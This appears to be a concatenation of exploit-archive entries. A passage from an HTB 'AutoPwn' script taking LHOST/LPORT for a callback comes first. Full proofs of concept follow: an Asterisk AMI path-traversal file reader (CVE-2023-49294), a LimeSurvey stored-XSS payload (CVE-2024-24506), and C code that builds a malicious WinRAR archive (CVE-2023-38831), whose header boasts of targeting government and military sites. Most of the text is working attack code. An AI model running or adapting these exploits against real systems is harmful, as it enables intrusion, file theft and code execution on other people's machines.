╚═╝ ╚═╝╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═╝ ╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚══════╝
{Style.RESET_ALL}
"""
print(ascii_art)
parser = argparse.ArgumentParser(description="AutoPwn Script for Bizness HTB machine", usage= "sudo Nagios.py <Target IP> <LHOST> <LPORT>")
parser.add_argument('IP' ,help= "Target IP ")
parser.add_argument('LHOST',help= "Local host")
parser.add_argument('LPORT' ,help= "Listening Port")
args = parser.parse_args()
min_required_args = 3
if len(vars(args)) != min_required_args:
parser.print_usage()
exit()
adminUsername, adminPassword = createAdmin(args.IP, sqlmap(args.IP,input(f"{Fore.MAGENTA}[+] Please insert a non-administrative username: "),input(f"{Fore.MAGENTA}[+] Please insert the password: ")))
print(f"{Fore.MAGENTA}[+] Admin Username=" + adminUsername)
print(f"{Fore.MAGENTA}[+] Admin Password=" + adminPassword)
adminExploit(adminUsername, adminPassword, args.IP,args.LHOST,args.LPORT)
# Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)
# Date: 2023-03-26
# Exploit Author: Sean Pesce
# Vendor Homepage: https://asterisk.org/
# Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/
# Version: 18.20.0
# Tested on: Debian Linux
# CVE: CVE-2023-49294
#!/usr/bin/env python3
#
# Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that
# facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of
# file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar
# to the common INI configuration format.
#
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2023-49294
# https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f
# https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/
import argparse
import getpass
import socket
import sys
CVE_ID = 'CVE-2023-49294'
DEFAULT_PORT = 5038
DEFAULT_FILE = '/etc/hosts'
DEFAULT_ACTION_ID = 0
DEFAULT_TCP_READ_SZ = 1048576 # 1MB
def ami_msg(action, args, encoding='utf8'):
assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}'
assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}'
if 'ActionID' not in args:
args['ActionID'] = 0
line_sep = '\r\n'
data = f'Action: {action}{line_sep}'
for a in args:
data += f'{a}: {args[a]}{line_sep}'
data += line_sep
return data.encode(encoding)
def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ):
assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}'
sock.sendall(data)
resp = b''
while not resp.endswith(b'\r\n\r\n'):
resp += sock.recv(read_sz)
return resp
if __name__ == '__main__':
# Parse command-line arguments
argparser = argparse.ArgumentParser()
argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server')
argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT)
argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True)
argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None)
argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE)
argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID)
if '-h' in sys.argv or '--help' in sys.argv:
print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr)
argparser.print_help()
sys.exit(0)
args = argparser.parse_args()
# Validate command-line arguments
assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}'
args.host = socket.gethostbyname(args.host)
if args.password is None:
args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ')
print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr)
print(f'[INFO] Connecting to Asterisk AMI: {args.user}@{args.host}:{args.port}', file=sys.stderr)
# Connect to the Asterisk AMI server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((args.host, args.port))
# Read server banner
banner = sock.recv(DEFAULT_TCP_READ_SZ)
print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr)
# Authenticate to the Asterisk AMI server
login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password})
login_resp = tcp_send_rcv(sock, login_msg)
while b'Authentication' not in login_resp:
login_resp = tcp_send_rcv(sock, b'')
if b'Authentication accepted' not in login_resp:
print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr)
sys.exit(1)
#print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr)
print(f'[INFO] Login success', file=sys.stderr)
# Obtain file data via path traversal
traversal = '../../../../../../../../'
cfg_msg = ami_msg('GetConfig', {
'ActionID': args.action_id,
'Filename': f'{traversal}{args.file}',
#'Category': 'default',
#'Filter': 'name_regex=value_regex,',
})
resp = tcp_send_rcv(sock, cfg_msg)
while b'Response' not in resp:
resp = tcp_send_rcv(sock, b'')
print(f'', file=sys.stderr)
print(f'{resp.decode("utf8")}')
if b'Error' in resp:
sys.exit(1)
pass # Done
# Exploit Title: Stored Cross-Site Scripting (XSS) in LimeSurvey Community
Edition Version 5.3.32+220817
# Exploit Author: Subhankar Singh
# Date: 2024-02-03
# Vendor: LimeSurvey
# Software Link: https://community.limesurvey.org/releases/
# Version: LimeSurvey Community Edition Version 5.3.32+220817
# Tested on: Windows (Client)
# CVE: CVE-2024-24506
## Description:
A critical security vulnerability exists in LimeSurvey Community Edition
Version 5.3.32+220817, particularly in the "General Setting"
functionality's "Administrator email address:" field. This allows an
attacker to compromise the super-admin account, leading to potential theft
of cookies and session tokens.
## Background:
Cross-site scripting (XSS) is a common web security vulnerability that
compromises user interactions with a vulnerable application. Stored XSS
occurs when user input is stored in the application and executed whenever a
user triggers or visits the page.
## Issue:
LimeSurvey fails to properly validate user-supplied input on both client
and server sides, despite some protective measures. The "Administrator
email address:" field within the "General Setting" functionality permits
the insertion of special characters, enabling the injection of malicious
JavaScript payloads. These payloads are stored in the database and executed
when the user saves or reloads the page.
## Steps To Reproduce:
1. Log into the LimeSurvey application.
2. Navigate to the general settings.
3. Insert the following JavaScript payload in the "Administrator email
address:" field:
Payload: `abcxyz@gmail.com"><u>s</u><svg
onload=confirm(document.domain)>`
## Expected Result:
The LimeSurvey application should display an alert with the domain after
clicking save and reloading the page.
## Actual Result:
The LimeSurvey application is vulnerable to Stored Cross-Site Scripting, as
evidenced by the successful execution of the injected payload.
## Proof of Concept:
Attached Screenshots for the reference.
################################################################################################
# Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# Description : All target's GOV & Military websites #
# #
################################################################################################
# #
# Expl0iTs: #
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "zip.h"
#define PDF_FILE "document.pdf"
#define FOLDER_NAME "document.pdf\\"
#define SCRIPT_FILE "script.bat"
#define ZIP_FILE "exploit.zip"
int main(void) {
zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE);
if (zf == NULL) {
printf("Error opening ZIP file\n");
return -1;
}
zip_fileinfo zfi;
memset(&zfi, 0, sizeof(zfi));
if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding PDF file to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
FILE *fp = fopen(PDF_FILE, "rb");
if (fp == NULL) {
printf("Error opening PDF file\n");
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
char buffer[1024];
int bytes_read;
while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) {
if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) {
printf("Error writing PDF file to ZIP file\n");
fclose(fp);
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
}
fclose(fp);
zipCloseFileInZip(zf);
if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding folder to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
zipCloseFileInZip(zf);
char script_name[256];
sprintf(script_name, "%s%s", FOLDER_NAME, SCRIPT_FILE);
if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding script file to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n";
if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) {
printf("Error writing script file to ZIP file\n");
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
zipCloseFileInZip(zf);
zipClose(zf, NULL);
printf("ZIP file created successfully\n");
return 0;
}
https://nvd.nist.gov/vuln/detail/CVE-2023-38831
https://nvd.nist.gov/vuln/detail/CVE-2023-38831
https://github.com/HDCE-inc/CVE-2023-38831
https://www.cvedetails.com/cve/CVE-2023-38831/
https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/CVE-2023-38831
http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html
https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/
https://news.ycombinator.com/item?id=37236100
https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
https://hdce.medium.com/cve-2023-38831-winrar-zero-day-poses-new-risks-for-traders-684911befad2